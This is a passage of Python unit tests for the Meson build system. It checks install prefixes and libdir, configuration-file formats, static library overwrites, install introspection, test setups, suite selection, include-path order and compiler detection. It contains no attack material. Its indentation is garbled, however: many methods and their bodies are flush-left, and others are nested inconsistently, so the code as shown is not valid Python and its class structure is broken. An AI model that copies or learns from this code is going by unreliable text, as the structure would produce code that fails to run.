        '''Assert that a build relinked *target* and nothing else.'''
        ret = self.build()
        if self.backend is Backend.ninja:
            # Collect every target ninja reports as linked.
            linked_targets = []
            for line in ret.split('\n'):
                if 'Linking target' in line:
                    fname = line.rsplit('target ')[-1]
                    linked_targets.append(self.get_target_from_filename(fname))
            self.assertEqual(linked_targets, [target])
        elif self.backend is Backend.vs:
            # Ensure that this target was rebuilt
            linkre = re.compile(r'Link:\n  [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
            matches = linkre.findall(ret)
            self.assertEqual(len(matches), 1, msg=matches)
            self.assertEqual(self.get_target_from_filename(matches[0]), target)
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
def assertPathExists(self, path):
m = f'Path {path!r} should exist'
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = f'Path {path!r} should not exist'
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
    '''
    Tests that should run on all platforms.
    '''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '87 default options')
self.init(testdir, default_args=False, inprocess=True)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
break
else:
raise self.fail('Did not find option "prefix"')
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
    def test_do_conf_file_by_format(self):
        '''Exercise do_conf_str in meson, cmake and cmake@ variable formats.'''
        def conf_str(in_data, confdata, vformat):
            (result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str('configuration_file', in_data, confdata, variable_format = vformat)
            return '\n'.join(result)
        def check_formats(confdata, result):
            # The same confdata must produce the same line in all three formats.
            self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
            self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
            self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
        confdata = ConfigurationData()
        # VAR is undefined, so all formats emit a commented-out undef
        check_formats(confdata, '/* #undef VAR */\n')
        # Check boolean
        confdata.values = {'VAR': (False, 'description')}
        check_formats(confdata, '#undef VAR\n')
        confdata.values = {'VAR': (True, 'description')}
        check_formats(confdata, '#define VAR\n')
        # Check string
        confdata.values = {'VAR': ('value', 'description')}
        check_formats(confdata, '#define VAR value\n')
        # Check integer
        confdata.values = {'VAR': (10, 'description')}
        check_formats(confdata, '#define VAR 10\n')
        # Check multiple string with cmake formats
        confdata.values = {'VAR': ('value', 'description')}
        self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
        self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
        self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
        self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
        # Handles meson format exceptions
        # Unknown format
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
        # More than 2 params in mesondefine
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
        # Mismatched line with format
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
        # Dict value in confdata
        confdata.values = {'VAR': (['value'], 'description')}
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
    def test_absolute_prefix_libdir(self):
        '''
        Tests that setting absolute paths for --prefix and --libdir work. Can't
        be an ordinary test because these are set via the command-line.
        https://github.com/mesonbuild/meson/issues/1341
        https://github.com/mesonbuild/meson/issues/1345
        '''
        testdir = os.path.join(self.common_test_dir, '87 default options')
        # on Windows, /someabs is *not* an absolute path
        prefix = 'x:/someabs' if is_windows() else '/someabs'
        libdir = 'libdir'
        extra_args = ['--prefix=' + prefix,
                      # This can just be a relative path, but we want to test
                      # that passing this as an absolute path also works
                      '--libdir=' + prefix + '/' + libdir]
        self.init(testdir, extra_args=extra_args, default_args=False)
        opts = self.introspect('--buildoptions')
        for opt in opts:
            if opt['name'] == 'prefix':
                self.assertEqual(prefix, opt['value'])
            elif opt['name'] == 'libdir':
                # The absolute libdir is reported back relative to prefix.
                self.assertEqual(libdir, opt['value'])
    def test_libdir_must_be_inside_prefix(self):
        '''
        Tests that libdir is forced to be inside prefix no matter how it is set.
        Must be a unit test for obvious reasons.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        # libdir being inside prefix is ok
        if is_windows():
            args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
        else:
            args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
        self.init(testdir, extra_args=args)
        self.wipe()
        # libdir not being inside prefix is not ok
        if is_windows():
            args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
        else:
            args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
        self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
        self.wipe()
        # libdir must be inside prefix even when set via mesonconf
        self.init(testdir)
        if is_windows():
            self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
        else:
            self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
    def test_prefix_dependent_defaults(self):
        '''
        Tests that configured directory paths are set to prefix dependent
        defaults.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        # Map of prefix -> expected option values for that prefix.
        expected = {
            '/opt': {'prefix': '/opt',
                     'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
                     'infodir': 'share/info',
                     'libexecdir': 'libexec', 'localedir': 'share/locale',
                     'localstatedir': 'var', 'mandir': 'share/man',
                     'sbindir': 'sbin', 'sharedstatedir': 'com',
                     'sysconfdir': 'etc'},
            '/usr': {'prefix': '/usr',
                     'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
                     'infodir': 'share/info',
                     'libexecdir': 'libexec', 'localedir': 'share/locale',
                     'localstatedir': '/var', 'mandir': 'share/man',
                     'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
                     'sysconfdir': '/etc'},
            '/usr/local': {'prefix': '/usr/local',
                           'bindir': 'bin', 'datadir': 'share',
                           'includedir': 'include', 'infodir': 'share/info',
                           'libexecdir': 'libexec',
                           'localedir': 'share/locale',
                           'localstatedir': '/var/local', 'mandir': 'share/man',
                           'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
                           'sysconfdir': 'etc'},
            # N.B. We don't check 'libdir' as it's platform dependent, see
            # default_libdir():
        }
        if mesonbuild.mesonlib.default_prefix() == '/usr/local':
            # None key means "no --prefix passed"; only valid when the
            # built-in default prefix matches.
            expected[None] = expected['/usr/local']
        for prefix in expected:
            args = []
            if prefix:
                args += ['--prefix', prefix]
            self.init(testdir, extra_args=args, default_args=False)
            opts = self.introspect('--buildoptions')
            for opt in opts:
                name = opt['name']
                value = opt['value']
                if name in expected[prefix]:
                    self.assertEqual(value, expected[prefix][name])
            self.wipe()
    def test_default_options_prefix_dependent_defaults(self):
        '''
        Tests that setting a prefix in default_options in project() sets prefix
        dependent defaults for other options, and that those defaults can
        be overridden in default_options or by the command line.
        '''
        testdir = os.path.join(self.common_test_dir, '163 default options prefix dependent defaults')
        # Map of extra command-line args -> expected option values.
        expected = {
            '':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/sharedstate'},
            '--prefix=/usr':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/sharedstate'},
            '--sharedstatedir=/var/state':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/var/state'},
            '--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
            {'prefix':         '/usr',
             'sysconfdir':     'sysconf',
             'localstatedir':  '/var',
             'sharedstatedir': '/var/state'},
        }
        for args in expected:
            self.init(testdir, extra_args=args.split(), default_args=False)
            opts = self.introspect('--buildoptions')
            for opt in opts:
                name = opt['name']
                value = opt['value']
                if name in expected[args]:
                    self.assertEqual(value, expected[args][name])
            self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
    def test_static_library_overwrite(self):
        '''
        Tests that static libraries are never appended to, always overwritten.
        Has to be a unit test because this involves building a project,
        reconfiguring, and building it again so that `ar` is run twice on the
        same static library.
        https://github.com/mesonbuild/meson/issues/1355
        '''
        testdir = os.path.join(self.common_test_dir, '3 static')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        static_linker = env.detect_static_linker(cc)
        if is_windows():
            raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
        if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
            raise unittest.SkipTest('static linker is not `ar`')
        # Configure
        self.init(testdir)
        # Get name of static library
        targets = self.introspect('--targets')
        self.assertEqual(len(targets), 1)
        libname = targets[0]['filename'][0]
        # Build and get contents of static library
        self.build()
        before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
        # Filter out non-object-file contents
        before = [f for f in before if f.endswith(('.o', '.obj'))]
        # Static library should contain only one object
        self.assertEqual(len(before), 1, msg=before)
        # Change the source to be built into the static library
        self.setconf('-Dsource=libfile2.c')
        self.build()
        after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
        # Filter out non-object-file contents
        after = [f for f in after if f.endswith(('.o', '.obj'))]
        # Static library should contain only one object
        self.assertEqual(len(after), 1, msg=after)
        # and the object must have changed
        self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '51 run target')
self.init(testdir)
self.run_target('check_exists')
self.run_target('check-env')
self.run_target('check-env-ct')
    def test_run_target_subdir(self):
        '''
        Test that run_targets are run from the correct directory
        https://github.com/mesonbuild/meson/issues/957
        '''
        testdir = os.path.join(self.common_test_dir, '51 run target')
        self.init(testdir)
        # textprinter is defined in a subdir of the test project.
        self.run_target('textprinter')
    def test_install_introspection(self):
        '''
        Tests that the Meson introspection API exposes install filenames correctly
        https://github.com/mesonbuild/meson/issues/829
        '''
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
        testdir = os.path.join(self.common_test_dir, '8 install')
        self.init(testdir)
        intro = self.introspect('--targets')
        # Normalize ordering: the static lib must come first.
        if intro[0]['type'] == 'executable':
            intro = intro[::-1]
        self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
        self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
    def test_install_subdir_introspection(self):
        '''
        Test that the Meson introspection API also contains subdir install information
        https://github.com/mesonbuild/meson/issues/5556
        '''
        testdir = os.path.join(self.common_test_dir, '59 install subdir')
        self.init(testdir)
        intro = self.introspect('--installed')
        # Map of source subdir (relative to testdir) -> install destination
        # (relative to prefix).
        expected = {
            'sub2': 'share/sub2',
            'subdir/sub1': 'share/sub1',
            'subdir/sub_elided': 'share',
            'sub1': 'share/sub1',
            'sub/sub1': 'share/sub1',
            'sub_elided': 'share',
            'nested_elided/sub': 'share',
            'new_directory': 'share/new_directory',
        }
        self.assertEqual(len(intro), len(expected))
        # Convert expected to PurePath
        expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
        intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
        for src, dst in expected_converted.items():
            self.assertIn(src, intro_converted)
            self.assertEqual(dst, intro_converted[src])
    def test_install_introspection_multiple_outputs(self):
        '''
        Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
        https://github.com/mesonbuild/meson/pull/4555

        Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
        TODO Change the format to a list officially in a followup PR
        '''
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
        testdir = os.path.join(self.common_test_dir, '140 custom target multiple outputs')
        self.init(testdir)
        intro = self.introspect('--targets')
        # Normalize ordering before checking the four custom targets.
        if intro[0]['type'] == 'executable':
            intro = intro[::-1]
        self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
        self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
        self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
        self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
    def test_install_log_content(self):
        '''
        Tests that the install-log.txt is consistent with the installed files and directories.
        Specifically checks that the log file only contains one entry per file/directory.
        https://github.com/mesonbuild/meson/issues/4499
        '''
        testdir = os.path.join(self.common_test_dir, '59 install subdir')
        self.init(testdir)
        self.install()
        installpath = Path(self.installdir)
        # Find installed files and directories
        expected = {installpath: 0}
        for name in installpath.rglob('*'):
            expected[name] = 0
        def read_logs():
            # Find logged files and directories
            with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
                return list(map(lambda l: Path(l.strip()),
                                filter(lambda l: not l.startswith('#'),
                                       f.readlines())))
        logged = read_logs()
        for name in logged:
            self.assertTrue(name in expected, f'Log contains extra entry {name}')
            expected[name] += 1
        # Every installed path must appear exactly once in the log.
        for name, count in expected.items():
            self.assertGreater(count, 0, f'Log is missing entry for {name}')
            self.assertLess(count, 2, f'Log has multiple entries for {name}')
        # Verify that with --dry-run we obtain the same logs but with nothing
        # actually installed
        windows_proof_rmtree(self.installdir)
        self._run(self.meson_command + ['install', '--dry-run', '--destdir', self.installdir], workdir=self.builddir)
        self.assertEqual(logged, read_logs())
        self.assertFalse(os.path.exists(self.installdir))
    def test_uninstall(self):
        '''Installed files and directories must be gone after uninstall.'''
        exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
        dirname = os.path.join(self.installdir, 'usr/share/dir')
        testdir = os.path.join(self.common_test_dir, '8 install')
        self.init(testdir)
        self.assertPathDoesNotExist(exename)
        self.install()
        self.assertPathExists(exename)
        self.uninstall()
        self.assertPathDoesNotExist(exename)
        self.assertPathDoesNotExist(dirname)
    def test_forcefallback(self):
        '''--wrap-mode=forcefallback must build and test with the subproject.'''
        testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
        self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
        self.build()
        self.run_tests()
def test_implicit_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '95 implicit force fallback')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir)
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.new_builddir()
self.init(testdir, extra_args=['--force-fallback-for=something'])
    def test_nopromote(self):
        '''--wrap-mode=nopromote must fail to find a nested subproject dep.'''
        testdir = os.path.join(self.common_test_dir, '98 subproject subdir')
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self.init(testdir, extra_args=['--wrap-mode=nopromote'])
        self.assertIn('dependency subsub found: NO', cm.exception.stdout)
    def test_force_fallback_for(self):
        '''--force-fallback-for must force the fallback for the named deps.'''
        testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
        self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
        self.build()
        self.run_tests()
    def test_testrepeat(self):
        '''meson test --repeat must run the suite multiple times cleanly.'''
        testdir = os.path.join(self.common_test_dir, '206 tap tests')
        self.init(testdir)
        self.build()
        self._run(self.mtest_command + ['--repeat=2'])
    def test_testsetups(self):
        '''Exercise add_test_setup(): env vars, wrappers, timeouts and
        suite exclusion, using valgrind as the example wrapper.'''
        if not shutil.which('valgrind'):
            raise unittest.SkipTest('Valgrind not installed.')
        testdir = os.path.join(self.unit_test_dir, '2 testsetups')
        self.init(testdir)
        self.build()
        # Run tests without setup
        self.run_tests()
        with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
            basic_log = f.read()
        # Run buggy test with setup that has env that will make it fail
        self.assertRaises(subprocess.CalledProcessError,
                          self._run, self.mtest_command + ['--setup=valgrind'])
        with open(os.path.join(self.logdir, 'testlog-valgrind.txt'), encoding='utf-8') as f:
            vg_log = f.read()
        self.assertFalse('TEST_ENV is set' in basic_log)
        self.assertFalse('Memcheck' in basic_log)
        self.assertTrue('TEST_ENV is set' in vg_log)
        self.assertTrue('Memcheck' in vg_log)
        # Run buggy test with setup without env that will pass
        self._run(self.mtest_command + ['--setup=wrapper'])
        # Setup with no properties works
        self._run(self.mtest_command + ['--setup=empty'])
        # Setup with only env works
        self._run(self.mtest_command + ['--setup=onlyenv'])
        self._run(self.mtest_command + ['--setup=onlyenv2'])
        self._run(self.mtest_command + ['--setup=onlyenv3'])
        # Setup with only a timeout works
        self._run(self.mtest_command + ['--setup=timeout'])
        # Setup that does not define a wrapper works with --wrapper
        self._run(self.mtest_command + ['--setup=timeout', '--wrapper', shutil.which('valgrind')])
        # Setup that skips test works
        self._run(self.mtest_command + ['--setup=good'])
        with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
            exclude_suites_log = f.read()
        self.assertFalse('buggy' in exclude_suites_log)
        # --suite overrides add_test_setup(exclude_suites)
        self._run(self.mtest_command + ['--setup=good', '--suite', 'buggy'])
        with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
            include_suites_log = f.read()
        self.assertTrue('buggy' in include_suites_log)
    def test_testsetup_selection(self):
        '''Setups are looked up per (sub)project; selection must respect
        project scoping and --no-suite filtering.'''
        testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
        self.init(testdir)
        self.build()
        # Run tests without setup
        self.run_tests()
        # A setup missing from an included project is an error...
        self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
        # ...unless the project lacking it is excluded from the run.
        self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
        self._run(self.mtest_command + ['--setup=worksforall'])
        self._run(self.mtest_command + ['--setup=main:worksforall'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
        self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
        self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=foo:onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=main:onlyinbar'])
    def test_testsetup_default(self):
        '''A setup marked is_default must apply when --setup is omitted.'''
        testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
        self.init(testdir)
        self.build()
        # Run tests without --setup will cause the default setup to be used
        self.run_tests()
        with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
            default_log = f.read()
        # Run tests with explicitly using the same setup that is set as default
        self._run(self.mtest_command + ['--setup=mydefault'])
        with open(os.path.join(self.logdir, 'testlog-mydefault.txt'), encoding='utf-8') as f:
            mydefault_log = f.read()
        # Run tests with another setup
        self._run(self.mtest_command + ['--setup=other'])
        with open(os.path.join(self.logdir, 'testlog-other.txt'), encoding='utf-8') as f:
            other_log = f.read()
        # Default and explicit default runs must see identical env.
        self.assertTrue('ENV_A is 1' in default_log)
        self.assertTrue('ENV_B is 2' in default_log)
        self.assertTrue('ENV_C is 2' in default_log)
        self.assertTrue('ENV_A is 1' in mydefault_log)
        self.assertTrue('ENV_B is 2' in mydefault_log)
        self.assertTrue('ENV_C is 2' in mydefault_log)
        self.assertTrue('ENV_A is 1' in other_log)
        self.assertTrue('ENV_B is 3' in other_log)
        self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
    """Exercise --suite/--no-suite filtering across the main project and
    its subprojects, checking the failed-test count for each selection."""
    testdir = os.path.join(self.unit_test_dir, '4 suite selection')
    self.init(testdir)
    self.build()
    # Each entry: (expected number of failing tests, extra mtest arguments).
    cases = [
        (4, []),
        (0, ['--suite', ':success']),
        (3, ['--suite', ':fail']),
        (4, ['--no-suite', ':success']),
        (1, ['--no-suite', ':fail']),
        (1, ['--suite', 'mainprj']),
        (0, ['--suite', 'subprjsucc']),
        (1, ['--suite', 'subprjfail']),
        (1, ['--suite', 'subprjmix']),
        (3, ['--no-suite', 'mainprj']),
        (4, ['--no-suite', 'subprjsucc']),
        (3, ['--no-suite', 'subprjfail']),
        (3, ['--no-suite', 'subprjmix']),
        (1, ['--suite', 'mainprj:fail']),
        (0, ['--suite', 'mainprj:success']),
        (3, ['--no-suite', 'mainprj:fail']),
        (4, ['--no-suite', 'mainprj:success']),
        (1, ['--suite', 'subprjfail:fail']),
        (0, ['--suite', 'subprjfail:success']),
        (3, ['--no-suite', 'subprjfail:fail']),
        (4, ['--no-suite', 'subprjfail:success']),
        (0, ['--suite', 'subprjsucc:fail']),
        (0, ['--suite', 'subprjsucc:success']),
        (4, ['--no-suite', 'subprjsucc:fail']),
        (4, ['--no-suite', 'subprjsucc:success']),
        (1, ['--suite', 'subprjmix:fail']),
        (0, ['--suite', 'subprjmix:success']),
        (3, ['--no-suite', 'subprjmix:fail']),
        (4, ['--no-suite', 'subprjmix:success']),
        (2, ['--suite', 'subprjfail', '--suite', 'subprjmix:fail']),
        (3, ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj']),
        (2, ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail']),
        (1, ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test']),
        (2, ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail']),
    ]
    for expected_failures, extra_args in cases:
        self.assertFailedTestCount(expected_failures, self.mtest_command + extra_args)
def test_build_by_default(self):
    """Targets with build_by_default disabled must not be built by the
    default ninja target, but must still be buildable on request."""
    testdir = os.path.join(self.common_test_dir, '129 build by default')
    self.init(testdir)
    self.build()
    generated = [os.path.join(self.builddir, name) for name in ('generated1.dat', 'generated2.dat')]
    executables = [os.path.join(self.builddir, name + exe_suffix) for name in ('fooprog', 'barprog')]
    # Only the generated files are built by default; the executables are not.
    for path in generated:
        self.assertPathExists(path)
    for path in executables:
        self.assertPathDoesNotExist(path)
    # Requesting the executables explicitly must still build them.
    self.build(target=('fooprog' + exe_suffix))
    self.assertPathExists(executables[0])
    self.build(target=('barprog' + exe_suffix))
    self.assertPathExists(executables[1])
def test_internal_include_order(self):
    """Verify that -I arguments appear on the compile command line in the
    documented priority order for both the 'someexe' and 'somefxe' targets."""
    if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
        raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
    testdir = os.path.join(self.common_test_dir, '130 include order')
    self.init(testdir)
    execmd = fxecmd = None
    for cmd in self.get_compdb():
        if 'someexe' in cmd['command']:
            execmd = cmd['command']
            continue
        if 'somefxe' in cmd['command']:
            fxecmd = cmd['command']
            continue
    if not execmd or not fxecmd:
        # Bug fix: this message used to misspell the target as 'somfxe'.
        raise Exception('Could not find someexe and somefxe commands')
    # Check include order for 'someexe'
    incs = [a for a in split_args(execmd) if a.startswith("-I")]
    self.assertEqual(len(incs), 9)
    # Need to run the build so the private dir is created.
    self.build()
    pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
    self.assertEqual(len(pdirs), 1)
    privdir = pdirs[0][len(self.builddir)+1:]
    # target private dir comes first
    self.assertPathEqual(incs[0], "-I" + privdir)
    # target build subdir
    self.assertPathEqual(incs[1], "-Isub4")
    # target source subdir
    self.assertPathBasenameEqual(incs[2], 'sub4')
    # include paths added via per-target c_args: ['-I'...]
    self.assertPathBasenameEqual(incs[3], 'sub3')
    # target include_directories: build dir
    self.assertPathEqual(incs[4], "-Isub2")
    # target include_directories: source dir
    self.assertPathBasenameEqual(incs[5], 'sub2')
    # target internal dependency include_directories: build dir
    self.assertPathEqual(incs[6], "-Isub1")
    # target internal dependency include_directories: source dir
    self.assertPathBasenameEqual(incs[7], 'sub1')
    # custom target include dir
    self.assertPathEqual(incs[8], '-Ictsub')
    # Check include order for 'somefxe'
    incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
    self.assertEqual(len(incs), 9)
    # target private dir
    pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
    self.assertEqual(len(pdirs), 1)
    privdir = pdirs[0][len(self.builddir)+1:]
    self.assertPathEqual(incs[0], '-I' + privdir)
    # target build dir
    self.assertPathEqual(incs[1], '-I.')
    # target source dir
    self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
    # target internal dependency correct include_directories: build dir
    self.assertPathEqual(incs[3], "-Isub4")
    # target internal dependency correct include_directories: source dir
    self.assertPathBasenameEqual(incs[4], 'sub4')
    # target internal dependency dep include_directories: build dir
    self.assertPathEqual(incs[5], "-Isub1")
    # target internal dependency dep include_directories: source dir
    self.assertPathBasenameEqual(incs[6], 'sub1')
    # target internal dependency wrong include_directories: build dir
    self.assertPathEqual(incs[7], "-Isub2")
    # target internal dependency wrong include_directories: source dir
    self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
    '''
    Test that automatic compiler detection and setting from the environment
    both work just fine. This is needed because while running project tests
    and other unit tests, we always read CC/CXX/etc from the environment.
    '''
    # Short aliases for the compiler/linker classes we expect detection
    # to produce. msvc and clangcl are tuples because C and C++ use
    # distinct classes.
    gnu = mesonbuild.compilers.GnuCompiler
    clang = mesonbuild.compilers.ClangCompiler
    intel = mesonbuild.compilers.IntelGnuLikeCompiler
    msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
    clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
    ar = mesonbuild.linkers.ArLinker
    lib = mesonbuild.linkers.VisualStudioLinker
    # (meson language id, environment variable holding the compiler).
    langs = [('c', 'CC'), ('cpp', 'CXX')]
    # Objective-C/C++ detection is skipped on Windows and on e2k machines.
    if not is_windows() and platform.machine().lower() != 'e2k':
        langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
    testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    for lang, evar in langs:
        # Detect with evar and do sanity checks on that
        if evar in os.environ:
            ecc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
            self.assertTrue(ecc.version)
            elinker = env.detect_static_linker(ecc)
            # Pop it so we don't use it for the next detection
            evalue = os.environ.pop(evar)
            # Very rough/strict heuristics. Would never work for actual
            # compiler detection, but should be ok for the tests.
            ebase = os.path.basename(evalue)
            if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
                self.assertIsInstance(ecc, gnu)
                self.assertIsInstance(elinker, ar)
            elif 'clang-cl' in ebase:
                # Must be checked before plain 'clang' since the name contains it.
                self.assertIsInstance(ecc, clangcl)
                self.assertIsInstance(elinker, lib)
            elif 'clang' in ebase:
                self.assertIsInstance(ecc, clang)
                self.assertIsInstance(elinker, ar)
            elif ebase.startswith('ic'):
